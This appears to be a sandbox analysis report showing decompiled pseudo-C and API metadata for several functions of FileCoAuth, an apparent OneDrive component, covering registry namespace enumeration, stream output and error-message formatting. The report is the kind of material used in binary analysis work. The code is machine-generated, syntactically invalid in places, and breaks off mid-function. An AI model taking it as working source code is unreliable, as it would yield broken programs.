				 *((intOrPtr*)(_t152 - 0x5c)) =  *((intOrPtr*)(_t152 + 0x10));
				E00E94E9D(_t152 - 0x58, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace");
				 *(_t152 - 4) = 0;
				 *(_t152 - 0x6c) = 0;
				 *((intOrPtr*)(_t152 - 0x68)) = 0;
				 *((intOrPtr*)(_t152 - 0x64)) = 0;
				 *(_t152 - 4) = 1;
				_t81 =  >=  ?  *((void*)(_t152 - 0x58)) : _t152 - 0x58;
				E00E94E9D(_t152 - 0x40,  >=  ?  *((void*)(_t152 - 0x58)) : _t152 - 0x58);
				 *(_t152 - 4) = 2;
				_push(_t152 - 0x6c);
				_push( *((intOrPtr*)(_t152 + 0xc)));
				_push(_t152 - 0x40);
				_push(0x80000001);
				_t85 = E00E9EF91(_t123, __edi, __esi,  *((intOrPtr*)(_t152 - 0x44)) - 8);
				_t150 = _t85;
				 *(_t152 - 4) = 1;
				E00E94307(_t152 - 0x40, 1, 0);
				if(_t85 >= 0) {
					_t151 =  *(_t152 - 0x6c);
					_t148 =  *((intOrPtr*)(_t152 - 0x68));
					while(_t151 != _t148) {
						E00E9A1D7(_t152 - 0x40, _t151);
						 *(_t152 - 4) = 3;
						_push(_t152 - 0x40);
						_push(_t123);
						__eflags = E00EA110C(_t123,  *((intOrPtr*)(_t152 - 0x60)), _t146, _t148, _t151, __eflags);
						if(__eflags != 0) {
							_push(_t152 - 0x40);
							_t118 = E00EA009C( *((intOrPtr*)(_t152 - 0x5c)), _t151, __eflags);
							_push(_t118);
							_t119 = _t118 + 0x10;
							__eflags = _t119;
							_push(_t119);
							_push(0);
							_push(_t152 - 0x74);
							E00EA0244(_t123,  *((intOrPtr*)(_t152 - 0x5c)), _t148, _t151, _t119);
						}
						 *(_t152 - 4) = 1;
						E00E94307(_t152 - 0x40, 1, 0);
						_t151 =  &(_t151[0x18]);
						__eflags = _t151;
					}
					_t150 = L"Personal";
					if(E00E99650(_t123, 0,  *((intOrPtr*)(_t123 + 0x10)), L"Personal", E00E94E74(L"Personal")) == 0) {
						_t150 =  *(_t152 - 0x6c);
						_t148 =  *((intOrPtr*)(_t152 - 0x68));
						while(_t150 != _t148) {
							E00E9A1D7(_t152 - 0x40, _t150);
							 *(_t152 - 4) = 4;
							_push(_t152 - 0x40);
							_push(_t123);
							_t98 = E00EA110C(_t123,  *((intOrPtr*)(_t152 - 0x60)), _t146, _t148, _t150, __eflags);
							__eflags = _t98;
							if(_t98 == 0) {
								 *((intOrPtr*)(_t152 - 0x18)) = 0;
								 *((intOrPtr*)(_t152 - 0x14)) = 0;
								 *((intOrPtr*)(_t152 - 0x14)) = 7;
								 *((intOrPtr*)(_t152 - 0x18)) = 0;
								 *((short*)(_t152 - 0x28)) = 0;
								 *(_t152 - 4) = 5;
								_t146 = _t152 - 0x40;
								_t103 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t152 - 0x60)))))) + 0x1c))(_t152 - 0x40,  *((intOrPtr*)(_t152 + 0xc)), _t152 - 0x28);
								__eflags = _t103;
								if(_t103 >= 0) {
									__eflags =  *((intOrPtr*)(_t152 - 0x14)) - 8;
									_t106 =  >=  ?  *((void*)(_t152 - 0x28)) : _t152 - 0x28;
									__imp__CompareStringOrdinal(_t106, 0xffffffff, L"{a52bba46-e9e1-435f-b3d9-28daa648c0f6}", 0xffffffff, 1);
									__eflags = _t106 - 2;
									if(__eflags != 0) {
										_t140 = _t123 + 0x30;
										__eflags =  *((intOrPtr*)(_t140 + 0x14)) - 8;
										if( *((intOrPtr*)(_t140 + 0x14)) >= 8) {
											_t140 =  *_t140;
										}
										__eflags =  *((intOrPtr*)(_t152 - 0x14)) - 8;
										_t108 =  >=  ?  *((void*)(_t152 - 0x28)) : _t152 - 0x28;
										__imp__CompareStringOrdinal(_t108, 0xffffffff, _t140, 0xffffffff, 1);
										__eflags = _t108 - 2;
										if(__eflags == 0) {
											_push(_t152 - 0x40);
											_t110 = E00EA009C( *((intOrPtr*)(_t152 - 0x5c)), _t150, __eflags);
											_push(_t110);
											_t111 = _t110 + 0x10;
											__eflags = _t111;
											_push(_t111);
											_t112 = _t152 - 0x7c;
											goto L16;
										}
									} else {
										_push(_t152 - 0x40);
										_t115 = E00EA009C( *((intOrPtr*)(_t152 - 0x5c)), _t150, __eflags);
										_push(_t115);
										_push(_t115 + 0x10);
										_t112 = _t152 - 0x74;
										L16:
										_push(0);
										_push(_t112);
										E00EA0244(_t123,  *((intOrPtr*)(_t152 - 0x5c)), _t148, _t150, __eflags);
									}
								}
								 *(_t152 - 4) = 4;
								E00E94307(_t152 - 0x28, 1, 0);
							}
							 *(_t152 - 4) = 1;
							E00E94307(_t152 - 0x40, 1, 0);
							_t150 =  &(_t150[0x18]);
							__eflags = _t150;
						}
					}
				}
				 *(_t152 - 4) = 0;
				E00E94EF3(_t152 - 0x6c);
				 *(_t152 - 4) =  *(_t152 - 4) | 0xffffffff;
				E00E94307(_t152 - 0x58, 1, 0);
				return E00EA3152(_t123, _t148, _t150);
			}


















    0x00ea0694
    0x00ea0694
    0x00ea0694
    0x00ea069b
    0x00ea06a0
    0x00ea06a9
    0x00ea06b1
    0x00ea06b4
    0x00ea06bb
    0x00ea06be
    0x00ea06c1
    0x00ea06c4
    0x00ea06c7
    0x00ea06d5
    0x00ea06da
    0x00ea06df
    0x00ea06e6
    0x00ea06e7
    0x00ea06ed
    0x00ea06ee
    0x00ea06f3
    0x00ea06f8
    0x00ea06fa
    0x00ea0705
    0x00ea070c
    0x00ea0712
    0x00ea0715
    0x00ea076a
    0x00ea071e
    0x00ea0723
    0x00ea072d
    0x00ea072e
    0x00ea0734
    0x00ea0736
    0x00ea073e
    0x00ea073f
    0x00ea0747
    0x00ea0748
    0x00ea0748
    0x00ea074b
    0x00ea074c
    0x00ea0751
    0x00ea0752
    0x00ea0752
    0x00ea0757
    0x00ea0762
    0x00ea0767
    0x00ea0767
    0x00ea0767
    0x00ea076e
    0x00ea078a
    0x00ea0790
    0x00ea0793
    0x00ea0897
    0x00ea079f
    0x00ea07a4
    0x00ea07ae
    0x00ea07af
    0x00ea07b0
    0x00ea07b5
    0x00ea07b7
    0x00ea07bf
    0x00ea07c2
    0x00ea07c5
    0x00ea07cc
    0x00ea07cf
    0x00ea07d3
    0x00ea07e1
    0x00ea07e9
    0x00ea07ec
    0x00ea07ee
    0x00ea07f4
    0x00ea07fd
    0x00ea080b
    0x00ea0811
    0x00ea0814
    0x00ea082c
    0x00ea082f
    0x00ea0833
    0x00ea0835
    0x00ea0835
    0x00ea0837
    0x00ea0840
    0x00ea084a
    0x00ea0850
    0x00ea0853
    0x00ea085b
    0x00ea085c
    0x00ea0861
    0x00ea0862
    0x00ea0862
    0x00ea0865
    0x00ea0866
    0x00000000
    0x00ea0866
    0x00ea0816
    0x00ea081c
    0x00ea081d
    0x00ea0822
    0x00ea0826
    0x00ea0827
    0x00ea0869
    0x00ea086c
    0x00ea086e
    0x00ea086f
    0x00ea086f
    0x00ea0814
    0x00ea0874
    0x00ea087f
    0x00ea087f
    0x00ea0884
    0x00ea088f
    0x00ea0894
    0x00ea0894
    0x00ea0894
    0x00ea0897
    0x00ea078a
    0x00ea089f
    0x00ea08a6
    0x00ea08ab
    0x00ea08b6
    0x00ea08c0

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00EA069B
      • Part of subcall function 00E9EF91: __EH_prolog3_GS.LIBCMT ref: 00E9EF9B
      • Part of subcall function 00E9EF91: RegOpenKeyExW.ADVAPI32(?,?,00000000,00000000,00000000), ref: 00E9EFED
      • Part of subcall function 00E9EF91: RegEnumKeyExW.ADVAPI32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00E9F032
      • Part of subcall function 00E9EF91: RegCloseKey.ADVAPI32(00000000), ref: 00E9F09C
      • Part of subcall function 00E94307: ??3@YAXPAX@Z.MSVCR120 ref: 00E94332
      • Part of subcall function 00EA110C: __EH_prolog3_GS.LIBCMT ref: 00EA1116
    • CompareStringOrdinal.KERNEL32(?,000000FF,{a52bba46-e9e1-435f-b3d9-28daa648c0f6},000000FF,00000001), ref: 00EA080B
    • CompareStringOrdinal.KERNEL32(?,000000FF,00000000,000000FF,00000001), ref: 00EA084A
      • Part of subcall function 00EA009C: __EH_prolog3_catch.LIBCMT ref: 00EA00A3
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: H_prolog3_$CompareOrdinalString$??3@CloseEnumH_prolog3_catchOpen
    • String ID: Personal$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace${a52bba46-e9e1-435f-b3d9-28daa648c0f6}
    • API String ID: 636749635-3553581249
    • Opcode ID: eebc616157de6eec1a0b6eb9b6d147edd6b08b37c58d0dda8552d7af344b2a78
    • Instruction ID: 48ab70449f7e510fbd2c588ca4ea49351e8e029ef5e882b6aad1996fcf60dc08
    • Opcode Fuzzy Hash: eebc616157de6eec1a0b6eb9b6d147edd6b08b37c58d0dda8552d7af344b2a78
    • Instruction Fuzzy Hash: E4713571D00208EEDF04EBE4CC85FEDBBB8AF1A314F245158E515BB282D774AA45CBA1
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E99D69, Relevance: 10.7, APIs: 7, Instructions: 175COMMON
    Download Yara Rule
    C-Code - Quality: 30%
    			E00E99D69(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t77;
				signed int _t78;
				signed int _t87;
				intOrPtr _t89;
				signed int _t94;
				signed short _t96;
				signed short _t102;
				signed short _t103;
				void* _t105;
				signed int _t107;
				signed short _t109;
				signed int _t113;
				intOrPtr _t115;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t136;
				char* _t143;
				intOrPtr* _t146;
				void* _t149;
				signed int _t151;
				signed int _t153;

				_push(0x3c);
				E00EA31CA(E00EA3D60, __ebx, __edi, __esi);
				_t146 = __ecx;
				 *((intOrPtr*)(_t149 - 0x2c)) = __ecx;
				 *(_t149 - 0x28) = "\\";
				 *(_t149 - 0x24) = 0;
				_t113 = 0;
				 *(_t149 - 0x20) = 1;
				_t77 =  *((intOrPtr*)( *__ecx + 4));
				 *(_t149 - 0x1c) = 0;
				_t115 =  *((intOrPtr*)(_t77 + __ecx + 0x20));
				_t78 =  *(_t77 + __ecx + 0x24);
				_t151 = _t78;
				if(_t151 < 0) {
					L7:
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x40], xmm0");
					 *(_t149 - 0x18) =  *(_t149 - 0x3c);
					 *(_t149 - 0x14) =  *(_t149 - 0x40);
				} else {
					if(_t151 > 0) {
						L6:
						 *(_t149 - 0x14) = _t115 - 1;
						asm("sbb eax, esi");
						 *(_t149 - 0x18) = _t78;
					} else {
						if(_t115 <= 0) {
							goto L7;
						} else {
							_t153 = _t78;
							if(_t153 < 0) {
								goto L7;
							} else {
								if(_t153 > 0) {
									goto L6;
								} else {
									_t154 = _t115 - 1;
									if(_t115 <= 1) {
										goto L7;
									} else {
										goto L6;
									}
								}
							}
						}
					}
				}
				_push(_t146);
				E00E97E66(_t113, _t149 - 0x48, _t146, 0, _t154);
				 *((intOrPtr*)(_t149 - 4)) = 0;
				if( *((char*)(_t149 - 0x44)) != 0) {
					 *((char*)(_t149 - 4)) = 1;
					__imp__?getloc@ios_base@std@@QBE?AVlocale@2@XZ(_t149 - 0x30);
					 *((char*)(_t149 - 4)) = 2;
					 *((intOrPtr*)(_t149 - 0x34)) = E00E9A0FC(_t113,  *_t146, _t146, 0, __eflags);
					 *((char*)(_t149 - 4)) = 1;
					E00E9A1BF(_t149 - 0x30);
					_t122 =  *((intOrPtr*)( *_t146 + 4));
					__eflags = ( *(_t122 + _t146 + 0x14) & 0x000001c0) - 0x40;
					if(( *(_t122 + _t146 + 0x14) & 0x000001c0) != 0x40) {
						_t107 =  *(_t149 - 0x14);
						_t136 =  *(_t149 - 0x18);
						while(1) {
							__eflags = _t136;
							if(__eflags < 0) {
								goto L17;
							}
							if(__eflags > 0) {
								L15:
								_t109 =  *( *((intOrPtr*)( *_t146 + 4)) + _t146 + 0x40) & 0x0000ffff;
								__imp__?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z(_t109);
								__eflags = 0xffff - (_t109 & 0x0000ffff);
								if(0xffff != (_t109 & 0x0000ffff)) {
									_t136 =  *(_t149 - 0x18);
									_t107 =  *(_t149 - 0x14) + 0xffffffff;
									 *(_t149 - 0x14) = _t107;
									asm("adc ecx, 0xffffffff");
									 *(_t149 - 0x18) = _t136;
									continue;
								} else {
									_t113 = _t113 | 0x00000004;
									__eflags = _t113;
									 *(_t149 - 0x1c) = _t113;
								}
							} else {
								__eflags = _t107;
								if(_t107 > 0) {
									goto L15;
								}
							}
							goto L17;
						}
					}
					L17:
					_t125 = 0;
					_t87 = 1;
					__eflags = 1;
					_t143 = "\\";
					while(1) {
						__eflags = _t113;
						if(_t113 != 0) {
							break;
						}
						__eflags = _t125;
						if(__eflags < 0) {
							L24:
							_t94 =  *(_t149 - 0x14);
							_t129 =  *(_t149 - 0x18);
							while(1) {
								__eflags = _t129;
								if(__eflags < 0) {
									goto L30;
								}
								if(__eflags > 0) {
									L28:
									_t96 =  *( *((intOrPtr*)( *_t146 + 4)) + _t146 + 0x40) & 0x0000ffff;
									__imp__?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z(_t96);
									__eflags = 0xffff - (_t96 & 0x0000ffff);
									if(0xffff != (_t96 & 0x0000ffff)) {
										_t129 =  *(_t149 - 0x18);
										_t94 =  *(_t149 - 0x14) + 0xffffffff;
										 *(_t149 - 0x14) = _t94;
										asm("adc ecx, 0xffffffff");
										 *(_t149 - 0x18) = _t129;
										continue;
									} else {
										_t113 = _t113 | 0x00000004;
										__eflags = _t113;
									}
								} else {
									__eflags = _t94;
									if(_t94 > 0) {
										goto L28;
									}
								}
								goto L30;
							}
						} else {
							if(__eflags > 0) {
								L22:
								 *(_t149 - 0x3c) =  *( *((intOrPtr*)( *_t146 + 4)) + _t146 + 0x38);
								_t102 =  *_t143 & 0x000000ff;
								__imp__?widen@?$ctype@_W@std@@QBE_WD@Z(_t102);
								_t103 = _t102 & 0x0000ffff;
								__imp__?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z(_t103);
								__eflags = 0xffff - (_t103 & 0x0000ffff);
								_t125 =  *(_t149 - 0x24);
								_t105 = 4;
								_t113 =  ==  ? _t105 : _t113;
								_t87 =  *(_t149 - 0x20) + 0xffffffff;
								 *(_t149 - 0x1c) = _t113;
								 *(_t149 - 0x20) = _t87;
								asm("adc ecx, 0xffffffff");
								_t143 =  &(( *(_t149 - 0x28))[1]);
								 *(_t149 - 0x24) = _t125;
								 *(_t149 - 0x28) = _t143;
								continue;
							} else {
								__eflags = _t87;
								if(_t87 <= 0) {
									goto L24;
								} else {
									goto L22;
								}
							}
						}
						break;
					}
					L30:
					_t89 =  *((intOrPtr*)( *_t146 + 4));
					 *((intOrPtr*)(_t89 + _t146 + 0x20)) = 0;
					 *((intOrPtr*)(_t89 + _t146 + 0x24)) = 0;
					 *((intOrPtr*)(_t149 - 4)) = 0;
				} else {
					_t113 = 4;
				}
				__imp__?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z(_t113, 0);
				E00E97ED1( *_t146, _t149 - 0x48);
				return E00EA313E(_t146);
			}

























    0x00e99d69
    0x00e99d70
    0x00e99d75
    0x00e99d77
    0x00e99d80
    0x00e99d88
    0x00e99d8b
    0x00e99d8d
    0x00e99d90
    0x00e99d93
    0x00e99d96
    0x00e99d9a
    0x00e99d9e
    0x00e99da0
    0x00e99dbe
    0x00e99dbe
    0x00e99dc1
    0x00e99dc9
    0x00e99dcf
    0x00e99da2
    0x00e99da2
    0x00e99db2
    0x00e99db4
    0x00e99db7
    0x00e99db9
    0x00e99da4
    0x00e99da6
    0x00000000
    0x00e99da8
    0x00e99da8
    0x00e99daa
    0x00000000
    0x00e99dac
    0x00e99dac
    0x00000000
    0x00e99dae
    0x00e99dae
    0x00e99db0
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00e99db0
    0x00e99dac
    0x00e99daa
    0x00e99da6
    0x00e99da2
    0x00e99dd2
    0x00e99dd6
    0x00e99ddb
    0x00e99de2
    0x00e99def
    0x00e99dfb
    0x00e99e03
    0x00e99e0f
    0x00e99e12
    0x00e99e16
    0x00e99e1d
    0x00e99e2a
    0x00e99e2d
    0x00e99e2f
    0x00e99e32
    0x00e99e35
    0x00e99e35
    0x00e99e37
    0x00000000
    0x00000000
    0x00e99e39
    0x00e99e3f
    0x00e99e44
    0x00e99e4e
    0x00e99e5c
    0x00e99e5f
    0x00e99edb
    0x00e99ede
    0x00e99ee1
    0x00e99ee4
    0x00e99ee7
    0x00000000
    0x00e99e61
    0x00e99e61
    0x00e99e61
    0x00e99e64
    0x00e99e64
    0x00e99e3b
    0x00e99e3b
    0x00e99e3d
    0x00000000
    0x00000000
    0x00e99e3d
    0x00000000
    0x00e99e39
    0x00e99e35
    0x00e99e67
    0x00e99e69
    0x00e99e6b
    0x00e99e6b
    0x00e99e6c
    0x00e99e71
    0x00e99e71
    0x00e99e73
    0x00000000
    0x00000000
    0x00e99e79
    0x00e99e7b
    0x00e99eef
    0x00e99eef
    0x00e99ef2
    0x00e99ef5
    0x00e99ef5
    0x00e99ef7
    0x00000000
    0x00000000
    0x00e99ef9
    0x00e99eff
    0x00e99f04
    0x00e99f0e
    0x00e99f1c
    0x00e99f1f
    0x00e99f36
    0x00e99f39
    0x00e99f3c
    0x00e99f3f
    0x00e99f42
    0x00000000
    0x00e99f21
    0x00e99f21
    0x00e99f21
    0x00e99f21
    0x00e99efb
    0x00e99efb
    0x00e99efd
    0x00000000
    0x00000000
    0x00e99efd
    0x00000000
    0x00e99ef9
    0x00e99e7d
    0x00e99e7d
    0x00e99e83
    0x00e99e8f
    0x00e99e92
    0x00e99e96
    0x00e99e9f
    0x00e99ea3
    0x00e99eb4
    0x00e99eb7
    0x00e99ebc
    0x00e99ebd
    0x00e99ec3
    0x00e99ec6
    0x00e99ec9
    0x00e99ecc
    0x00e99ecf
    0x00e99ed0
    0x00e99ed3
    0x00000000
    0x00e99e7f
    0x00e99e7f
    0x00e99e81
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00e99e81
    0x00e99e7d
    0x00000000
    0x00e99e7b
    0x00e99f24
    0x00e99f26
    0x00e99f29
    0x00e99f2d
    0x00e99f69
    0x00e99de4
    0x00e99de6
    0x00e99de6
    0x00e99f75
    0x00e99f7e
    0x00e99f8a

    APIs
    • __EH_prolog3_catch.LIBCMT ref: 00E99D70
    • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP120(?,?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E99DFB
    • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP120(?,?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E99E4E
    • ?widen@?$ctype@_W@std@@QBE_WD@Z.MSVCP120(00EA8DB8,?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E99E96
    • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP120(?,?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E99EA3
    • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP120(?,?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E99F0E
    • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000000,00000000,?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E99F75
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: U?$char_traits@_W@std@@@std@@$?sputc@?$basic_streambuf@_$?getloc@ios_base@std@@?setstate@?$basic_ios@_?widen@?$ctype@_H_prolog3_catchVlocale@2@W@std@@
    • String ID:
    • API String ID: 2211854858-0
    • Opcode ID: f265e10021a8efa6e728e0ccc7b42b62e847d021558de7cd5e63054e1bccc7fb
    • Instruction ID: 7c6db2293b5b55dada209a5ebe942b663d62036c983fed65445c147404625c1c
    • Opcode Fuzzy Hash: f265e10021a8efa6e728e0ccc7b42b62e847d021558de7cd5e63054e1bccc7fb
    • Instruction Fuzzy Hash: 74613674A0121A8FCF28DFA8C4909BCBBF1BF59314B24511EE526F7792C730A941CBA0
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E982B9, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 115COMMON
    Download Yara Rule
    C-Code - Quality: 60%
    			E00E982B9(void* __ecx, char _a4, void _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, wchar_t* _a24, void _a28, void* _a32, short _a144, void _a146, char _a148, short _a4242, char _a4244, signed int _a4260, signed int _a4268) {
				char _v0;
				char _v4;
				char _v20;
				intOrPtr _v28;
				char _v44;
				char _v48;
				intOrPtr _v52;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t38;
				signed int _t40;
				int _t55;
				intOrPtr _t69;
				void* _t70;
				int _t76;
				void _t86;
				void* _t87;
				intOrPtr _t89;
				void* _t90;
				signed int _t91;
				signed int _t92;
				void* _t97;

				_t92 = _t91 & 0xfffffff8;
				_push(0xffffffff);
				_push(E00EA3B19);
				_push( *[fs:0x0]);
				_push(__ecx);
				E00EA3610(0x10bc);
				_t38 =  *0xeb0090; // 0xbb40e64e
				_a4260 = _t38 ^ _t92;
				_t40 =  *0xeb0090; // 0xbb40e64e
				_push(_t40 ^ _t92);
				 *[fs:0x0] =  &_a4268;
				_t95 = _a4;
				_t86 = _a8;
				_t69 = _a16;
				_t89 = _a20;
				if(_a4 == 0) {
					_v20 = GetLastError();
					memset( &_a8, 0, 0x98);
					_t76 =  &_a8;
					_push(1);
					_push(2);
					E00E97773(_t69, _t76, _t86, _t89, _t95);
					_a4268 = _a4268 & 0x00000000;
					_push(_t89);
					_push( &_v0);
					E00E97EF0(_t69, _t86, _t89, _t95);
					_a144 = 0;
					memset( &_a146, 0, 0xffe);
					_t55 = _vsnwprintf( &_a144, 0x7ff, _a24,  &_a28);
					_t92 = _t92 + 0x28;
					if(_t55 < 0) {
						L4:
						_a4242 = 0;
					} else {
						_t76 = 0x7ff;
						_t97 = _t55 - 0x7ff;
						if(_t97 > 0 || _t97 == 0) {
							goto L4;
						}
					}
					E00E97EF0(_t69, _t86, _t89, 0);
					E00E9817A( &_v20,  &_v44);
					_a4244 = 1;
					E00E9823D(_t69,  &_v48, _v52);
					_t65 =  >=  ? _v48 :  &_v48;
					_t83 = _t89;
					E00E990D4(_t69,  &_v48, _t89, _t86, _t89, _v28 - 8);
					E00E94307( &_v64, 1, 0);
					E00E97DF8();
					__imp__??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ( >=  ? _v48 :  &_v48, _t86, _a12, _t69, E00E97EF0(_t69, _t86, _t89, 0),  &_v4, L" : ", _t76,  &_a148);
				}
				 *[fs:0x0] = _a4268;
				_pop(_t87);
				_pop(_t90);
				_pop(_t70);
				return E00EA29F2(_t70, _a4260 ^ _t92, _t83, _t87, _t90);
			}




























    0x00e982be
    0x00e982c1
    0x00e982c3
    0x00e982ce
    0x00e982cf
    0x00e982d5
    0x00e982da
    0x00e982e1
    0x00e982eb
    0x00e982f2
    0x00e982fa
    0x00e98300
    0x00e98304
    0x00e98307
    0x00e9830a
    0x00e9830d
    0x00e9831e
    0x00e98329
    0x00e98331
    0x00e98335
    0x00e98337
    0x00e98339
    0x00e9833e
    0x00e9834a
    0x00e9834b
    0x00e9834c
    0x00e98359
    0x00e98369
    0x00e98385
    0x00e9838b
    0x00e98390
    0x00e9839d
    0x00e9839f
    0x00e98392
    0x00e98392
    0x00e98397
    0x00e98399
    0x00000000
    0x00000000
    0x00e98399
    0x00e983c1
    0x00e983cf
    0x00e983dc
    0x00e983e4
    0x00e983f6
    0x00e983fb
    0x00e983ff
    0x00e9840c
    0x00e98415
    0x00e9841e
    0x00e9841e
    0x00e9842b
    0x00e98433
    0x00e98434
    0x00e98435
    0x00e98447

    APIs
    • GetLastError.KERNEL32(BB40E64E,?,?,?,?,?,00EA3B19,000000FF,?,00E967F9,?,d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\win32api.cpp,000001D1,Win32Api::TaskDialogIndirect,pTaskConfig != NULL,pTaskConfig was NULL), ref: 00E98313
    • memset.MSVCR120 ref: 00E98329
      • Part of subcall function 00E97773: __EH_prolog3.LIBCMT ref: 00E9777A
      • Part of subcall function 00E97773: ??0?$basic_ios@_WU?$char_traits@_W@std@@@std@@IAE@XZ.MSVCP120(00000008,00E9833E,00000002,00000001), ref: 00E97797
      • Part of subcall function 00E97773: ??0?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAE@PAV?$basic_streambuf@_WU?$char_traits@_W@std@@@1@_N@Z.MSVCP120(?,00000000,00000000,00000008,00E9833E,00000002,00000001), ref: 00E977AF
      • Part of subcall function 00E97EF0: __EH_prolog3_catch.LIBCMT ref: 00E97EF7
      • Part of subcall function 00E97EF0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00E98084
    • memset.MSVCR120 ref: 00E98369
    • _vsnwprintf.MSVCR120 ref: 00E98385
    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120(00000001,00000000,?,00000000,?,?), ref: 00E9841E
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: U?$char_traits@_$W@std@@@std@@$memset$??0?$basic_ios@_??0?$basic_ostream@_??1?$basic_ios@_?setstate@?$basic_ios@_ErrorH_prolog3H_prolog3_catchLastV?$basic_streambuf@_W@std@@@1@__vsnwprintf
    • String ID: :
    • API String ID: 2443301839-3653984579
    • Opcode ID: 6e7d09b4126e3a58db037d6112d0780a6357a8a2a5ee477cbb48ab102b8280db
    • Instruction ID: 42d92de3998a97be3282f412dac605afec8427e5212b83f8833cb05c5bf7a6a1
    • Opcode Fuzzy Hash: 6e7d09b4126e3a58db037d6112d0780a6357a8a2a5ee477cbb48ab102b8280db
    • Instruction Fuzzy Hash: 9F41A171108381AFDB20DF64DC46F9BB7E8EF89710F00492EF598A3191DA70E948CB62
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E928A9, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 71libraryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 72%
    			E00E928A9(void* __ebx, struct HINSTANCE__* __ecx, signed int __edx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				void* __esi;
				signed int _t23;
				void* _t27;
				signed int _t28;
				intOrPtr* _t32;
				void* _t33;
				void* _t36;
				intOrPtr* _t37;
				struct HINSTANCE__* _t39;
				void* _t41;
				intOrPtr _t47;
				void* _t50;
				signed int _t52;

				_t49 = __edx;
				_t41 = __ebx;
				_t23 =  *0xeb0090; // 0xbd336131
				_v8 = _t23 ^ _t52;
				_v16 = _v16 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_t27 = E00E923DD(__ecx, __edx, _t50,  &_v16,  &_v12);
				_t51 = _t27;
				if(_t27 >= 0) {
					_t32 = _v12;
					_t49 =  &_v20;
					_t33 =  *((intOrPtr*)( *_t32 + 0x1c))(_t32,  &_v20);
					_t51 = _t33;
					if(_t33 >= 0) {
						if( *0xeb2330 != 1) {
							L5:
							_t49 = __imp__#186;
						} else {
